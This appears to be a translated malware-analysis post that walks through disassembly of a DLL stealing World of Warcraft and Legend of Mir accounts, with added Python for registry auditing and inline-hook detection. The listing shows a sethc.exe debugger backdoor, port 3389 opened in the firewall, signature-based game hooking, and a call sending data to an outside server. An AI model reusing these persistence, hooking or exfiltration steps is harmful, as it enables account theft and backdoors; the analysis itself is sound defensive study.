10005069 |. 8D85 3CF8FFFF lea eax, [local.497]
1000506F |. 57 push edi
10005070 |. 50 push eax
10005071 |. E8 BACC0000 call <clear memory block>
10005076 |. 8D85 CCFEFFFF lea eax, [local.77]
1000507C |. 50 push eax
1000507D |. 8D85 40F9FFFF lea eax, [local.432]
10005083 |. 68 00330210 push 10023300 ; %s\PCHEALTH\HELPCTR\Binaries
10005088 |. 50 push eax
10005089 |. E8 38E70000 call <string handler>
1000508E |. 8D85 CCFEFFFF lea eax, [local.77]
10005094 |. 50 push eax
10005095 |. 8D85 3CF8FFFF lea eax, [local.497]
1000509B |. 68 D4320210 push 100232D4 ; %s\PCHEALTH\HELPCTR\Binaries\helpctr.exe
100050A0 |. 50 push eax
100050A1 |. E8 20E70000 call <string handler>
100050A6 |. 53 push ebx
100050A7 |. 57 push edi
100050A8 |. BE 58C60210 mov esi, 1002C658 ; ASCII "C:\Program Files\Internet Explorer"
100050AD |. 56 push esi
100050AE |. C785 2CF8FFFF 0>mov [local.501], 1
100050B8 |. E8 73CC0000 call <clear memory block>
100050BD |. 83C4 3C add esp, 3C
100050C0 |. 8D85 38F8FFFF lea eax, [local.498]
100050C6 |. 50 push eax
100050C7 |. 68 90320210 push 10023290 ; Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
100050CC |. 68 02000080 push 80000002
100050D1 |. FF15 6C140310 call dword ptr [1003146C] ; RegOpenKeyA opens this key
100050D7 |. 85C0 test eax, eax
100050D9 |. 75 63 jnz short 1000513E
100050DB |. 8D85 34F8FFFF lea eax, [local.499]
100050E1 |. 50 push eax
100050E2 |. 56 push esi
100050E3 |. 8D85 2CF8FFFF lea eax, [local.501]
100050E9 |. 50 push eax
100050EA |. 57 push edi
100050EB |. 68 84320210 push 10023284 ; Path
100050F0 |. FFB5 38F8FFFF push [local.498]
100050F6 |. 899D 34F8FFFF mov [local.499], ebx
100050FC |. FF15 24150310 call dword ptr [10031524] ; RegQueryValueExA reads the value's contents into address 1002c658
10005102 |. FFB5 38F8FFFF push [local.498]
10005108 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
1000510E |. 89B5 30F8FFFF mov [local.500], esi
10005114 |. FF8D 30F8FFFF dec [local.500]
1000511A |. 56 push esi
1000511B |. E8 50EA0000 call 10013B70
10005120 |. 59 pop ecx
10005121 |. 8B8D 30F8FFFF mov ecx, [local.500]
10005127 |. 803C08 3B cmp byte ptr [eax+ecx], 3B
1000512B |. 75 11 jnz short 1000513E
1000512D |. 56 push esi
1000512E |. E8 3DEA0000 call 10013B70
10005133 |. 59 pop ecx
10005134 |. 8B8D 30F8FFFF mov ecx, [local.500]
1000513A |. C60408 00 mov byte ptr [eax+ecx], 0
1000513E |> 8D85 38F8FFFF lea eax, [local.498]
10005144 |. 50 push eax
10005145 |. 68 48320210 push 10023248 ; Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedPath
1000514A |. 68 01000080 push 80000001
1000514F |. FF15 6C140310 call dword ptr [1003146C] ; RegOpenKeyA
Opening port 3389
10002ACC |. 68 402A0210 |push 10022A40 ; :%dGetTcpTable\iphlpapi.dll
10002AD1 |. 50 |push eax
10002AD2 |. E8 EF0C0100 |call <string handler>
10002AD7 |. 8D45 F0 |lea eax, [local.4]
10002ADA |. 50 |push eax
10002ADB |. 57 |push edi
10002ADC |. E8 5F0C0100 |call <compare>
10002AE1 |. 83C4 14 |add esp, 14
10002AE4 |. 85C0 |test eax, eax
10002AE6 |. 75 0C |jnz short 10002AF4
10002AE8 |. 8D45 F0 |lea eax, [local.4]
10002AEB |. 50 |push eax
10002AEC |. 57 |push edi
10002AED |. E8 8E0F0100 |call 10013A80
10002AF2 |. 59 |pop ecx
10002AF3 |. 59 |pop ecx
10002AF4 |> 68 08110310 |push 10031108 ; ASCII ":z3389"
10002AF9 |. E8 72100100 |call 10013B70
10002AFE |. 59 |pop ecx
10002AFF |. 83F8 02 |cmp eax, 2
10002B02 |. 76 44 |jbe short 10002B48
10002B04 |. 68 0A110310 |push 1003110A ; ASCII "3389"
10002B09 |. E8 FC1D0100 |call 1001490A
10002B0E |. 8985 B8FEFFFF |mov [local.82], eax
10002B14 |. 0FB706 |movzx eax, word ptr [esi]
10002B17 |. 59 |pop ecx
10002B18 |. 50 |push eax
10002B19 |. FF15 14020310 |call dword ptr [10030214] ; ws2_32.ntohs
.....
100055C3 |. 68 70300210 push 10023070 ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\sethc.exe
100055C8 |. BE 02000080 mov esi, 80000002
100055CD |. 56 push esi
100055CE |. FF15 E0C20210 call dword ptr [1002C2E0] ; advapi32.RegCreateKeyA
100055D4 |. 85C0 test eax, eax
100055D6 |. 75 27 jnz short 100055FF
100055D8 |. 6A 0C push 0C
100055DA |. 68 5C300210 push 1002305C ; winhlp32.exe
100055DF |. 6A 01 push 1
100055E1 |. 57 push edi
100055E2 |. 68 50300210 push 10023050 ; debugger
100055E7 |. FFB5 38F8FFFF push [local.498]
100055ED |. FF15 84DD0210 call dword ptr [1002DD84] ; advapi32.RegSetValueExA
100055F3 |. FFB5 38F8FFFF push [local.498]
100055F9 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
100055FF |> 8D85 38F8FFFF lea eax, [local.498]
10005605 |. 50 push eax
10005606 |. 68 E02F0210 push 10022FE0 ; SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\Listdebugger
1000560B |. 56 push esi
1000560C |. FF15 6C140310 call dword ptr [1003146C] ; advapi32.RegOpenKeyA
10005612 |. 85C0 test eax, eax
10005614 |. 75 27 jnz short 1000563D
10005616 |. 6A 27 push 27
10005618 |. 68 B82F0210 push 10022FB8 ; 3389:TCP:*:Enabled:@xpsp2res.dll,-22009SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\Listdebugger
1000561D |. 6A 01 push 1
1000561F |. 57 push edi
10005620 |. 68 AC2F0210 push 10022FAC ; 3389:TCP
10005625 |. FFB5 38F8FFFF push [local.498]
1000562B |. FF15 84DD0210 call dword ptr [1002DD84] ; advapi32.RegSetValueExA
10005631 |. FFB5 38F8FFFF push [local.498]
10005637 |. FF15 D0100310 call dword ptr [100310D0] ; advapi32.RegCloseKey
1000563D |> 8D85 74FCFFFF lea eax, [local.227]
10005643 |. 50 push eax
10005644 |. E8 61F9FFFF call 10004FAA
10005649 |. 8B35 84200210 mov esi, dword ptr [10022084] ; kernel32.GetFileAttributesA
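Thread 2 leaves two registry artifacts that are easy to audit: an Image File Execution Options key for sethc.exe whose "debugger" value points at winhlp32.exe (the same process name that thread function 1 checks before starting thread 4), and a "3389:TCP" entry under the firewall's GloballyOpenPorts\List. The following Python is an added example (not from the original post or the sample) that evaluates a registry snapshot for both artifacts. The snapshot format, the constructed sample entries, the extra accessibility binaries in the watchlist and the remote-admin port list are assumptions for the demonstration; on a live host the snapshot would be filled from a registry export.

```python
IFEO = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
FW_OPEN_PORTS = (r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
                 r"\FirewallPolicy\StandardProfile\GloballyOpenPorts\List")

# Accessibility binaries whose IFEO Debugger value deserves a high-severity
# finding. sethc.exe is the one in the listing; the others are assumed additions.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe"}
# Ports whose exposure through the host firewall is rated high (assumed list).
REMOTE_ADMIN_PORTS = {"3389"}

# Constructed snapshot shaped like a registry export: {key path: {value name: data}}.
# The two suspicious entries reproduce what thread 2 writes; the rest is benign filler.
SAMPLE_SNAPSHOT = {
    IFEO + r"\sethc.exe": {"debugger": "winhlp32.exe"},
    IFEO + r"\notepad.exe": {"DisableExceptionChainValidation": 0},
    FW_OPEN_PORTS: {
        "3389:TCP": "3389:TCP:*:Enabled:@xpsp2res.dll,-22009",
        "139:TCP": "139:TCP:LocalSubNet:Disabled:constructed",
    },
}


def _get_ci(values, name):
    """Registry value names are case-insensitive; the sample writes 'debugger'."""
    for k, v in values.items():
        if k.lower() == name.lower():
            return v
    return None


def check_ifeo(snapshot):
    """Report every IFEO subkey carrying a Debugger value."""
    prefix = IFEO.lower() + "\\"
    findings = []
    for key, values in snapshot.items():
        k = key.lower()
        if not k.startswith(prefix):
            continue
        image = k[len(prefix):].split("\\")[0]
        debugger = _get_ci(values, "Debugger")
        if debugger:
            findings.append({"type": "ifeo-debugger", "image": image,
                             "debugger": debugger,
                             "severity": "high" if image in ACCESSIBILITY else "medium"})
    return findings


def check_open_ports(snapshot):
    """Report enabled GloballyOpenPorts entries; data is port:proto:scope:state:name."""
    findings = []
    for key, values in snapshot.items():
        if key.lower() != FW_OPEN_PORTS.lower():
            continue
        for name, data in values.items():
            fields = str(data).split(":")
            if len(fields) < 4:
                continue
            port, proto, scope, state = fields[:4]
            if state.lower() != "enabled":
                continue
            findings.append({"type": "firewall-open-port", "value": name, "port": port,
                             "proto": proto, "scope": scope,
                             "severity": "high" if port in REMOTE_ADMIN_PORTS else "low"})
    return findings


def audit(snapshot):
    """IFEO findings first, then firewall findings."""
    return check_ifeo(snapshot) + check_open_ports(snapshot)


if __name__ == "__main__":
    for f in audit(SAMPLE_SNAPSHOT):
        print(f)
```

A scope of `*` on the 3389 entry means the exception applies to every source address, which is why it is rated higher than an entry limited to LocalSubNet; the IFEO check treats any Debugger value as a finding because legitimate uses of that value are rare outside developer machines.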
Thread 3:
10009325 /. 55 push ebp ; thread 3
10009326 |. 8BEC mov ebp, esp
10009328 |. B8 0C290000 mov eax, 290C
1000932D |. E8 EEAC0000 call 10014020
10009332 |. A1 60B00210 mov eax, dword ptr [1002B060]
10009337 |. 33C5 xor eax, ebp
10009339 |. 8945 FC mov [local.1], eax
1000933C |. 53 push ebx
1000933D |. 56 push esi
1000933E |. 57 push edi
1000933F |. BE 00280000 mov esi, 2800
10009344 |. 56 push esi
10009345 |. 33DB xor ebx, ebx
10009347 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000934D |. 53 push ebx
1000934E |. 50 push eax
1000934F |. E8 DC890000 call <clear memory block>
10009354 |. 68 00010000 push 100
10009359 |. 8D85 FCFEFFFF lea eax, [local.65]
1000935F |. 53 push ebx
10009360 |. 50 push eax
10009361 |. E8 CA890000 call <clear memory block>
10009366 |. 68 20030000 push 320
1000936B |. 53 push ebx
1000936C |. BF 28F40210 mov edi, 1002F428
10009371 |. 57 push edi
10009372 |. E8 B9890000 call <clear memory block>
10009377 |. 68 F8120310 push 100312F8 ; ASCII "d41d8cd98f00b204e9800998ecf8427e"
1000937C |. 68 E0C10210 push 1002C1E0 ; ASCII "c06a104c7ee76da815861809b2cf7925"
10009381 |. 8D85 FCFEFFFF lea eax, [local.65]
10009387 |. 68 1C3B0210 push 10023B1C ; d=bb&bbe=%s&bb=%s&yx=wow
1000938C |. 50 push eax
1000938D |. E8 34A40000 call <string handler>
10009392 |. 56 push esi
10009393 |. 8D85 FCD6FFFF lea eax, [local.2625]
10009399 |. 50 push eax
1000939A |. 8D85 FCFEFFFF lea eax, [local.65]
100093A0 |. 50 push eax
100093A1 |. 68 B0290210 push 100229B0 ; oa/css/img/www.asp
100093A6 |. 6A 50 push 50
100093A8 |. 68 9C290210 push 1002299C ; www.zjdasheng.com
100093AD |. E8 E88EFFFF call 1000229A ; network connection
100093B2 |. 8D85 FCD6FFFF lea eax, [local.2625]
100093B8 |. 83C4 4C add esp, 4C
100093BB |. 50 push eax
100093BC |. E8 94870100 call 10021B55
100093C1 |. C70424 F4010000 mov dword ptr [esp], 1F4
100093C8 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100093CE |. BE 70360210 mov esi, 10023670 ; star:
100093D3 |. 8D85 FCD6FFFF lea eax, [local.2625]
100093D9 |. 56 push esi
100093DA |. 50 push eax
100093DB |. E8 60A30000 call <compare>
100093E0 |. 59 pop ecx
100093E1 |. 59 pop ecx
100093E2 |. 85C0 test eax, eax
100093E4 |. 0F84 DB010000 je 100095C5
100093EA |. 8D85 FCD6FFFF lea eax, [local.2625]
100093F0 |. 68 DC340210 push 100234DC ; okok:
100093F5 |. 50 push eax
100093F6 |. E8 45A30000 call <compare>
100093FB |. 59 pop ecx
100093FC |. 59 pop ecx
100093FD |. 85C0 test eax, eax
100093FF |. 0F84 C0010000 je 100095C5
10009405 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000940B |. 68 DC340210 push 100234DC ; okok:
10009410 |. 50 push eax
10009411 |. E8 2AA30000 call <compare>
10009416 |. 8818 mov byte ptr [eax], bl
10009418 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000941E |. 56 push esi
1000941F |. 50 push eax
10009420 |. E8 1BA30000 call <compare>
10009425 |. 8D70 05 lea esi, dword ptr [eax+5]
10009428 |. 6A 3B push 3B
1000942A |. 56 push esi
1000942B |. E8 50A20000 call 10013680
10009430 |. 83C4 18 add esp, 18
10009433 |. 85C0 test eax, eax
10009435 |. 74 41 je short 10009478
10009437 |. 89BD F8D6FFFF mov [local.2626], edi
1000943D |> 6A 3B /push 3B
1000943F |. 56 |push esi
10009440 |. E8 3BA20000 |call 10013680
10009445 |. 6A 13 |push 13
10009447 |. 56 |push esi
10009448 |. FFB5 F8D6FFFF |push [local.2626]
1000944E |. 8985 F4D6FFFF |mov [local.2627], eax
10009454 |. 8818 |mov byte ptr [eax], bl
10009456 |. E8 E5A40000 |call <get current file path>
1000945B |. 8BB5 F4D6FFFF |mov esi, [local.2627]
10009461 |. 8385 F8D6FFFF 1>|add [local.2626], 14
10009468 |. 46 |inc esi
10009469 |. 6A 3B |push 3B
1000946B |. 56 |push esi
1000946C |. E8 0FA20000 |call 10013680
10009471 |. 83C4 1C |add esp, 1C
10009474 |. 85C0 |test eax, eax
10009476 |.^ 75 C5 \jnz short 1000943D
10009478 |> 6A 10 push 10
1000947A |. 5E pop esi
1000947B |. 56 push esi
1000947C |. 53 push ebx
1000947D |. 57 push edi
1000947E |. E8 BEC00000 call <search signature>
10009483 |. 83C4 0C add esp, 0C
10009486 |. 85C0 test eax, eax
10009488 |. 0F84 37010000 je 100095C5
1000948E |. 56 push esi
1000948F |. 53 push ebx
10009490 |. 68 3CF40210 push 1002F43C
10009495 |. E8 A7C00000 call <search signature>
1000949A |. 83C4 0C add esp, 0C
1000949D |. 85C0 test eax, eax
1000949F |. 0F84 20010000 je 100095C5
100094A5 |. 56 push esi
100094A6 |. 53 push ebx
100094A7 |. 68 C8F40210 push 1002F4C8
100094AC |. E8 90C00000 call <search signature>
100094B1 |. 56 push esi
100094B2 |. 53 push ebx
100094B3 |. 68 64F40210 push 1002F464
100094B8 |. A3 34170310 mov dword ptr [10031734], eax
100094BD |. E8 7FC00000 call <search signature>
100094C2 |. 56 push esi
100094C3 |. 53 push ebx
100094C4 |. 68 04F50210 push 1002F504
100094C9 |. A3 38170310 mov dword ptr [10031738], eax
100094CE |. E8 6EC00000 call <search signature>
100094D3 |. 83C4 24 add esp, 24
100094D6 |. 50 push eax
100094D7 |. 68 5C020310 push 1003025C
100094DC |. 68 AE620010 push 100062AE
100094E1 |. 56 push esi
100094E2 |. 53 push ebx
100094E3 |. 68 F0F40210 push 1002F4F0
100094E8 |. E8 54C00000 call <search signature>
100094ED |. 83C4 0C add esp, 0C
100094F0 |. 50 push eax
100094F1 |. 56 push esi
100094F2 |. 53 push ebx
100094F3 |. 68 DCF40210 push 1002F4DC
100094F8 |. E8 44C00000 call <search signature>
100094FD |. 83C4 0C add esp, 0C
10009500 |. 50 push eax
10009501 |. E8 F97DFFFF call <compute hook point> // hook function
10009506 |. 56 push esi
10009507 |. 53 push ebx
10009508 |. 68 50F40210 push 1002F450
1000950D |. E8 2FC00000 call <search signature>
10009512 |. 83C4 20 add esp, 20
10009515 |. 50 push eax
10009516 |. 68 20140310 push 10031420
1000951B |. 68 CA660010 push 100066CA
10009520 |. 56 push esi
10009521 |. 53 push ebx
10009522 |. 68 3CF40210 push 1002F43C
10009527 |. E8 15C00000 call <search signature>
1000952C |. 83C4 0C add esp, 0C
1000952F |. 50 push eax
10009530 |. 56 push esi
10009531 |. 53 push ebx
10009532 |. 57 push edi
10009533 |. E8 09C00000 call <search signature>
10009538 |. 83C4 0C add esp, 0C
1000953B |. 50 push eax
1000953C |. E8 BE7DFFFF call <compute hook point>
10009541 |. 56 push esi
10009542 |. 53 push ebx
10009543 |. 68 B4F40210 push 1002F4B4
10009548 |. E8 F4BF0000 call <search signature>
1000954D |. 83C4 20 add esp, 20
10009550 |. 50 push eax
10009551 |. 68 1CC40210 push 1002C41C
10009556 |. 68 1D680010 push 1000681D
1000955B |. 56 push esi
1000955C |. 53 push ebx
1000955D |. 68 A0F40210 push 1002F4A0
10009562 |. E8 DABF0000 call <search signature>
10009567 |. 83C4 0C add esp, 0C
1000956A |. 50 push eax
1000956B |. 56 push esi
1000956C |. 53 push ebx
1000956D |. 68 8CF40210 push 1002F48C
10009572 |. E8 CABF0000 call <search signature>
10009577 |. 83C4 0C add esp, 0C
1000957A |. 50 push eax
1000957B |. E8 7F7DFFFF call <compute hook point>
10009580 |. 6A 14 push 14
10009582 |. 53 push ebx
10009583 |. BE 48140310 mov esi, 10031448
10009588 |. 56 push esi
10009589 |. 891D 4C170310 mov dword ptr [1003174C], ebx
1000958F |. 891D 44170310 mov dword ptr [10031744], ebx
10009595 |. 891D 24170310 mov dword ptr [10031724], ebx
1000959B |. E8 90870000 call <clear memory block>
100095A0 |. 68 78F40210 push 1002F478
100095A5 |. 56 push esi
100095A6 |. E8 C5A40000 call 10013A70
100095AB |. 83C4 28 add esp, 28
100095AE |. 53 push ebx ; /pThreadId
100095AF |. 53 push ebx ; |CreationFlags
100095B0 |. 53 push ebx ; |pThreadParm
100095B1 |. 68 BE910010 push 100091BE ; |ThreadFunction = 4bf3db98.100091BE
100095B6 |. 53 push ebx ; |StackSize
100095B7 |. 53 push ebx ; |pSecurity
100095B8 |. FF15 94200210 call dword ptr [10022094] ; \CreateThread thread 6
100095BE |. 50 push eax ; /hObject
100095BF |. FF15 90200210 call dword ptr [10022090] ; \CloseHandle
100095C5 |> 8B4D FC mov ecx, [local.1]
100095C8 |. 5F pop edi
100095C9 |. 5E pop esi
100095CA |. 33CD xor ecx, ebp
100095CC |. 5B pop ebx
100095CD |. E8 78A20000 call 1001384A
100095D2 |. C9 leave
100095D3 \. C3 retn
Thread 6: checks for Legend of Mir
100091BE /. 55 push ebp
100091BF |. 8BEC mov ebp, esp
100091C1 |. 83EC 10 sub esp, 10
100091C4 |. 56 push esi
100091C5 |. 68 4C3A0210 push 10023A4C ; mir.exeyx=ftp&ss=%s
100091CA |. BE 50C50210 mov esi, 1002C550 ; d:\tools\ollyice\loaddll.exe
100091CF |. 56 push esi
100091D0 |. E8 6BA50000 call <比较cmp>
100091D5 |. 59 pop ecx
100091D6 |. 59 pop ecx
100091D7 |. 85C0 test eax, eax
100091D9 |. 74 05 je short 100091E0
100091DB |. E8 1BFFFFFF call 100090FB
100091E0 |> 68 D03A0210 push 10023AD0 ; wow.exews2_32.dll
100091E5 |. 56 push esi
100091E6 |. E8 55A50000 call <比较cmp>
100091EB |. 59 pop ecx
100091EC |. 59 pop ecx
100091ED |. 85C0 test eax, eax
100091EF |. 74 05 je short 100091F6
100091F1 |. E8 05FFFFFF call 100090FB
100091F6 |> 68 403A0210 push 10023A40 ; mir1.dat
100091FB |. 56 push esi
100091FC |. E8 3FA50000 call <比较cmp>
10009201 |. 59 pop ecx
10009202 |. 59 pop ecx
10009203 |. 85C0 test eax, eax
10009205 |. 75 37 jnz short 1000923E
10009207 |. 68 343A0210 push 10023A34 ; mir2.dat
Hook function:
100012FF <4bf3db9>/$ 55 push ebp
10001300 |. 8BEC mov ebp, esp
10001302 |. 51 push ecx
10001303 |. 51 push ecx
10001304 |. 57 push edi
10001305 |. 8B7D 08 mov edi, [arg.1]
10001308 |. 85FF test edi, edi
1000130A |. 75 07 jnz short 10001313
1000130C |. 32C0 xor al, al
1000130E |. E9 E2000000 jmp 100013F5
......
10001338 |. 51 push ecx ; /pOldProtect
10001339 |. 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
1000133B |. 6A 0B push 0B ; |Size = B (11.)
1000133D |. 897E 12 mov dword ptr [esi+12], edi ; |
10001340 |. 8B3D 30200210 mov edi, dword ptr [10022030] ; |kernel32.GetCurrentProcess
10001346 |. 50 push eax ; |Address
10001347 |. 8946 23 mov dword ptr [esi+23], eax ; |
1000134A |. C646 0C 00 mov byte ptr [esi+C], 0 ; |
1000134E |. FFD7 call edi ; |[GetCurrentProcess
10001350 |. 8B1D 2C200210 mov ebx, dword ptr [1002202C] ; |kernel32.VirtualProtectEx
10001356 |. 50 push eax ; |hProcess
10001357 |. FFD3 call ebx ; \VirtualProtectEx  remove the page protection
10001359 |. 6A 0B push 0B
1000135B |. FF75 0C push [arg.2]
1000135E |. 56 push esi
1000135F |. E8 4C0A0100 call 10011DB0
10001364 |. 6A 0B push 0B
10001366 |. 68 90000000 push 90
1000136B |. FF75 0C push [arg.2]
1000136E |. E8 BD090100 call <清理一块内存空间出来>
10001373 |. 0FB645 18 movzx eax, byte ptr [ebp+18]
10001377 |. 50 push eax
10001378 |. FF75 08 push [arg.1]
1000137B |. 8945 F8 mov [local.2], eax
1000137E |. FF75 0C push [arg.2]
10001381 |. E8 2A0A0100 call 10011DB0
10001386 |. 8B4D 0C mov ecx, [arg.2]
10001389 |. 8B55 08 mov edx, [arg.1]
1000138C |. 8B45 F8 mov eax, [local.2]
1000138F |. 2BD1 sub edx, ecx ; subtract the two addresses (arg.1 - arg.2)
10001391 |. 83C4 24 add esp, 24
10001394 |. 83EA 05 sub edx, 5 ; compute the rel32 displacement for the hook jmp
10001397 |. C60408 E9 mov byte ptr [eax+ecx], 0E9
1000139B |. 895408 01 mov dword ptr [eax+ecx+1], edx
1000139F |. 8D45 FC lea eax, [local.1]
100013A2 |. 50 push eax
100013A3 |. FF75 FC push [local.1]
100013A6 |. 6A 0B push 0B
100013A8 |. 51 push ecx
100013A9 |. FFD7 call edi
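The displacement arithmetic at 1000138F-1000139B is the usual rel32 computation for a 5-byte near jmp. As an added example (not the sample's code or the author's), this Python script reproduces the patch the hook writes and, from the defender's side, scans an image for E9 jumps that leave the module, which is how an inline hook into an injected DLL shows up in memory; the image bytes and base address are constructed, while the target 0x100062AE is the landing pad the author shows next.

```python
import struct

JMP_REL32 = 0xE9   # opcode of the 5-byte near jmp the hook writes
JMP_LEN = 5
PATCH_LEN = 0x0B   # the hook touches 11 bytes (push 0B) ...
NOP = 0x90         # ... and fills them with NOP first (push 90)

def encode_jmp(src, dst):
    """5-byte 'jmp rel32' from src to dst: rel32 = dst - src - 5, little-endian
    after E9, i.e. the sub/sub/mov sequence at 1000138F-1000139B.
    Masking to 32 bits reproduces the wraparound of a backward jump."""
    rel32 = (dst - src - JMP_LEN) & 0xFFFFFFFF
    return bytes([JMP_REL32]) + struct.pack("<I", rel32)

def build_patch(src, dst, jmp_offset=0):
    """The 11-byte overwrite: NOP fill with the jmp at jmp_offset (the byte the
    hook reads from [ebp+18]); src is the address of the first patched byte."""
    patch = bytearray([NOP] * PATCH_LEN)
    patch[jmp_offset:jmp_offset + JMP_LEN] = encode_jmp(src + jmp_offset, dst)
    return bytes(patch)

def decode_jmp_target(code, base, off):
    """Where the E9 at code[off] lands when the buffer is mapped at base."""
    rel32 = struct.unpack_from("<i", code, off + 1)[0]  # signed displacement
    return (base + off + JMP_LEN + rel32) & 0xFFFFFFFF

def find_foreign_jmps(code, base):
    """Detection heuristic: (address, target) for every E9 whose target falls
    outside the image [base, base + len(code)). An inline hook into an
    injected DLL shows up as such a jump; an E9 byte inside another
    instruction's operand can give a false positive, so hits are leads."""
    end = base + len(code)
    hits = []
    for off in range(len(code) - JMP_LEN + 1):
        if code[off] == JMP_REL32:
            target = decode_jmp_target(code, base, off)
            if not base <= target < end:
                hits.append((base + off, target))
    return hits

def demo():
    """Constructed 64-byte image at 0x00401000 (not taken from the sample):
    a benign in-image jmp at +3, then the hook patch written at +0x10 toward
    0x100062AE, the landing pad shown in the post."""
    base = 0x00401000
    image = bytearray(b"\x55\x8B\xEC" + encode_jmp(base + 3, base + 0x30))
    image += b"\xCC" * (0x40 - len(image))
    image[0x10:0x10 + PATCH_LEN] = build_patch(base + 0x10, 0x100062AE)
    return find_foreign_jmps(bytes(image), base)

if __name__ == "__main__":
    for addr, target in demo():
        print(f"jmp at {addr:08X} leaves the image -> {target:08X}")
```

The same displacement rule encodes the `call 10006284` at 100062AF below (E8 D0FFFFFF), which is a quick way to check the arithmetic against the listing.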
After the game is hooked, execution jmps here from the game module:
100062AE 60 db 60 ; CHAR '`'
100062AF . E8 D0FFFFFF call 10006284
100062B4 . 61 popad
10006284 /$ 33C0 xor eax, eax
10006286 |. 40 inc eax
10006287 |. 3905 44170310 cmp dword ptr [10031744], eax
1000628D |. 74 1E je short 100062AD
1000628F |. A3 44170310 mov dword ptr [10031744], eax
10006294 |. 33C0 xor eax, eax
10006296 |. 50 push eax
10006297 |. 50 push eax
10006298 |. 50 push eax
10006299 |. 68 68600010 push 10006068 // thread 5: reads World of Warcraft game information
1000629E |. 50 push eax
1000629F |. 50 push eax
100062A0 |. FF15 5CC70210 call dword ptr [1002C75C]
100062A6 |. 50 push eax
100062A7 |. FF15 8C100310 call dword ptr [1003108C]
100062AD \> C3 retn
Thread 5:
10006068 /. 55 push ebp
10006069 |. 8BEC mov ebp, esp
1000606B |. 81EC 340D0000 sub esp, 0D34
10006071 |. A1 60B00210 mov eax, dword ptr [1002B060]
10006076 |. 33C5 xor eax, ebp
10006078 |. 8945 FC mov [local.1], eax
1000607B |. 53 push ebx
1000607C |. 56 push esi
1000607D |. 57 push edi
1000607E |. BE 000C0000 mov esi, 0C00
10006083 |. 56 push esi
10006084 |. 33DB xor ebx, ebx
10006086 |. 8D85 CCF2FFFF lea eax, [local.845]
1000608C |. 53 push ebx
1000608D |. 50 push eax
1000608E |. E8 9DBC0000 call <清理一块内存空间出来>
10006093 |. 68 04290210 push 10022904 ; rb
10006098 |. 68 6C350210 push 1002356C ; WTF\Config.wtf
1000609D |. E8 5DDF0000 call 10013FFF ; reads the game server information
100060A2 |. 8BF8 mov edi, eax
100060A4 |. 83C4 14 add esp, 14
100060A7 |. 3BFB cmp edi, ebx
100060A9 |. 0F84 C6010000 je 10006275
100060AF |. 57 push edi
100060B0 |. 6A 01 push 1
100060B2 |. 8D85 CCF2FFFF lea eax, [local.845]
100060B8 |. 56 push esi
100060B9 |. 50 push eax
100060BA |. E8 67DE0000 call 10013F26
.......
10006239 |. E8 32D80000 call 10013A70
1000623E |. 8D85 64FFFFFF lea eax, [local.39]
10006244 |. 50 push eax
10006245 |. 57 push edi
10006246 |. E8 25D80000 call 10013A70
1000624B |. 83C4 28 add esp, 28
1000624E |. E8 EFFBFFFF call 10005E42 ; key call: the function checks whether the character is Alliance or Horde
10006253 |> 33DB xor ebx, ebx
10006255 |> 833D 70170310 0>cmp dword ptr [10031770], 1
1000625C |. 75 17 jnz short 10006275
1000625E |. 53 push ebx
1000625F |. 53 push ebx
10006260 |. 53 push ebx
10006261 |. 68 60570010 push 10005760 ; thread 6
10006266 |. 53 push ebx
10006267 |. 53 push ebx
10006268 |. FF15 5CC70210 call dword ptr [1002C75C]
1000626E |. 50 push eax
1000626F |. FF15 8C100310 call dword ptr [1003108C]
10006275 |> 8B4D FC mov ecx, [local.1]
10006278 |. 5F pop edi
10006279 |. 5E pop esi
1000627A |. 33CD xor ecx, ebp
1000627C |. 5B pop ebx
1000627D |. E8 C8D50000 call 1001384A
10006282 |. C9 leave
10006283 \. C3 retn
Thread 6: it sends window messages to the World of Warcraft window; I guess it also uses the Hearthstone to return.
10005760 /. 55 push ebp
10005761 |. 8BEC mov ebp, esp
10005763 |. B8 342D0000 mov eax, 2D34
10005768 |. E8 B3E80000 call 10014020
1000576D |. A1 60B00210 mov eax, dword ptr [1002B060]
10005772 |. 33C5 xor eax, ebp
10005774 |. 8945 FC mov [local.1], eax
10005777 |. 53 push ebx
10005778 |. 56 push esi
10005779 |. 57 push edi
1000577A |. 68 20140310 push 10031420
1000577F |. E8 D3B9FFFF call 10001157
10005784 |. C70424 F4010000 mov dword ptr [esp], 1F4
1000578B |. FF15 7CDD0210 call dword ptr [1002DD7C]
10005791 |. 68 00140000 push 1400
10005796 |. 33FF xor edi, edi
10005798 |. 57 push edi
10005799 |. BE 78C80210 mov esi, 1002C878
1000579E |. 56 push esi
1000579F |. C705 50170310 0>mov dword ptr [10031750], 2
100057A9 |. E8 82C50000 call <清理一块内存空间出来>
100057AE |. 68 B0340210 push 100234B0 ; /script ToggleBag(0);ToggleBag(0);
100057B3 |. 56 push esi
100057B4 |. E8 B7E20000 call 10013A70
100057B9 |. 8B35 BC210210 mov esi, dword ptr [100221BC] ; user32.SendMessageA
100057BF |. 83C4 14 add esp, 14
100057C2 |. 57 push edi ; /lParam
100057C3 |. 6A 0D push 0D ; |wParam = D
100057C5 |. BB 00010000 mov ebx, 100 ; |
100057CA |. 53 push ebx ; |Message => WM_KEYDOWN
100057CB |. FF35 44C40210 push dword ptr [1002C444] ; |hWnd = NULL
100057D1 |. FFD6 call esi ; \SendMessageA
100057D3 |. 57 push edi ; /lParam
100057D4 |. 6A 0D push 0D ; |wParam = D
100057D6 |. 8D7B 01 lea edi, dword ptr [ebx+1] ; |
100057D9 |. 57 push edi ; |Message => WM_KEYUP
100057DA |. FF35 44C40210 push dword ptr [1002C444] ; |hWnd = NULL
